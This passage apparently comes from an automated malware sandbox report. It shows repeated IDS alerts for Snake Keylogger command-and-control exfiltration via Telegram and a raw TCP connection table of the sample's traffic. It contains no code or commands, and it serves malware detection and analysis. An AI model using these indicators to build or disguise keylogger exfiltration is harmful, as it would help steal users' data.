                                                                                                            2025-01-10T21:53:43.120484+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549966149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:44.469261+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549978149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:44.827470+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549978149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:46.165705+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549992149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:46.523696+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549992149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:47.899210+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549994149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:48.307274+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549994149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:49.714041+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549996149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:50.162912+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549996149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:51.487456+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549998149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:51.745783+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549998149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:53.072656+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550000149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:53.521129+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550000149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:54.852859+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550002149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:55.218536+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550002149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:56.551895+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550004149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:56.899911+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550004149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:58.235121+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550006149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:58.626572+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550006149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:59.990628+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550008149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:00.415285+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550008149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:01.743321+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550010149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:02.010007+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550010149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:03.311177+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550012149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:03.762826+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550012149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:05.099974+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550014149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:05.377072+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550014149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:06.699169+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550016149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:06.949529+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550016149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:08.299177+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550018149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:08.660150+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550018149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:09.997332+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550020149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:10.311142+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550020149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:11.647843+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550022149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:12.148088+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550022149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:13.504537+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550024149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:13.880682+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550024149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:15.227888+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550026149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:15.739463+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550026149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:17.083559+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550028149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:17.396884+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550028149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:18.772286+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550030149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:19.009047+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550030149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:20.363513+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550032149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:20.663616+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550032149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:22.025052+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550034149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:22.334571+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550034149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:23.642541+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550036149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:23.939305+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550036149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:25.293495+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550038149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:25.633403+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550038149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:27.013839+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550040149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:27.275603+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550040149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:28.650344+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550042149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:28.966098+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550042149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:30.290587+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550044149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:30.719533+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550044149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:32.057964+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550046149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:32.680343+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550046149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:34.032254+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550048149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:34.432841+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550048149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:35.760434+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550050149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:36.122209+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550050149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:37.461689+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550052149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:37.976920+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550052149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:39.285866+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550054149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:39.575244+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550054149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:40.970394+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550056149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:41.366751+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550056149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:42.732052+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550058149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:43.154255+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550058149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:44.467248+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550060149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:44.897740+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550060149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:46.270205+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550062149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:46.729765+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550062149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:50.129484+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550064149.154.167.220443TCP
                                                                                                            2025-01-10T21:54:50.540759+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.550064149.154.167.220443TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 10, 2025 21:53:21.768343925 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:21.768381119 CET44349827142.250.181.238192.168.2.5
                                                                                                            Jan 10, 2025 21:53:21.768817902 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:21.787136078 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:21.787163973 CET44349827142.250.181.238192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.515831947 CET44349827142.250.181.238192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.515923977 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:22.516916990 CET44349827142.250.181.238192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.516988039 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:22.583139896 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:22.583185911 CET44349827142.250.181.238192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.584116936 CET44349827142.250.181.238192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.584306002 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:22.587376118 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:22.631350040 CET44349827142.250.181.238192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.884840965 CET44349827142.250.181.238192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.885008097 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:22.885068893 CET44349827142.250.181.238192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.885225058 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:22.885247946 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:22.885320902 CET44349827142.250.181.238192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.885725975 CET44349827142.250.181.238192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.885735035 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:22.885790110 CET49827443192.168.2.5142.250.181.238
                                                                                                            Jan 10, 2025 21:53:22.912890911 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:22.912961960 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.913054943 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:22.913326979 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:22.913348913 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:23.580215931 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:23.580341101 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:23.585712910 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:23.585737944 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:23.586148024 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:23.586225986 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:23.600946903 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:23.643347025 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.810261011 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.810596943 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.815973997 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.816083908 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.828414917 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.828504086 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.828533888 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.828588963 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.834798098 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.834873915 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.902117014 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.902219057 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.902259111 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.902271032 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.902321100 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.902347088 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.902347088 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.902369976 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.902399063 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.902443886 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.905504942 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.905580044 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.905606031 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.905657053 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.911808014 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.911886930 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.911916971 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.911967993 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.917993069 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.918076992 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.918097973 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.918148041 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.924271107 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.924345016 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.924365997 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.924413919 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.930650949 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.930772066 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.930795908 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.930846930 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.936881065 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.936964035 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.936986923 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.937036991 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.943694115 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.943784952 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.943811893 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.943945885 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.948494911 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.948597908 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.948621035 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.948667049 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.954518080 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.954600096 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.954627037 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.954673052 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.960052013 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.960128069 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.967160940 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.967334986 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.967365980 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.967422962 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.994498014 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.994565964 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.994580984 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.994605064 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.994640112 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.994676113 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.994687080 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.994750023 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.994807959 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.994870901 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.994925976 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.994987011 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.994999886 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.995058060 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.995065928 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.995079041 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.995112896 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.995152950 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.995162964 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.995225906 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.996393919 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.996455908 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:26.997956038 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:26.998043060 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.001926899 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.001996994 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.002010107 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.002069950 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.006890059 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.006983995 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.006998062 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.007057905 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.011881113 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.011950016 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.011965036 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.012026072 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.016474009 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.016545057 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.016556978 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.016623020 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.021234989 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.021322966 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.021336079 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.021393061 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.025886059 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.025960922 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.025973082 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.026031017 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.030459881 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.030534983 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.030548096 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.030610085 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.035218000 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.035350084 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.035397053 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.035465002 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.039848089 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.039937973 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.039961100 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.040024996 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.044054985 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.044138908 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.044156075 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.044224977 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.048257113 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.048326015 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.048356056 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.048414946 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.048508883 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.048564911 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.048599005 CET44349835172.217.18.97192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.048603058 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.048664093 CET49835443192.168.2.5172.217.18.97
                                                                                                            Jan 10, 2025 21:53:27.385272980 CET4986180192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:53:27.390175104 CET8049861132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.390258074 CET4986180192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:53:27.390430927 CET4986180192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:53:27.395172119 CET8049861132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:53:28.090756893 CET8049861132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:53:28.099018097 CET4986180192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:53:28.103823900 CET8049861132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:53:28.334659100 CET8049861132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:53:28.377863884 CET4986180192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:53:28.693413973 CET49871443192.168.2.5104.21.16.1
                                                                                                            Jan 10, 2025 21:53:28.693471909 CET44349871104.21.16.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:28.693542004 CET49871443192.168.2.5104.21.16.1
                                                                                                            Jan 10, 2025 21:53:28.695831060 CET49871443192.168.2.5104.21.16.1
                                                                                                            Jan 10, 2025 21:53:28.695852995 CET44349871104.21.16.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:29.204277992 CET44349871104.21.16.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:29.204368114 CET49871443192.168.2.5104.21.16.1
                                                                                                            Jan 10, 2025 21:53:29.208568096 CET49871443192.168.2.5104.21.16.1
                                                                                                            Jan 10, 2025 21:53:29.208581924 CET44349871104.21.16.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:29.209148884 CET44349871104.21.16.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:29.216557980 CET49871443192.168.2.5104.21.16.1
                                                                                                            Jan 10, 2025 21:53:29.259381056 CET44349871104.21.16.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:29.355130911 CET44349871104.21.16.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:29.355287075 CET44349871104.21.16.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:29.355487108 CET49871443192.168.2.5104.21.16.1
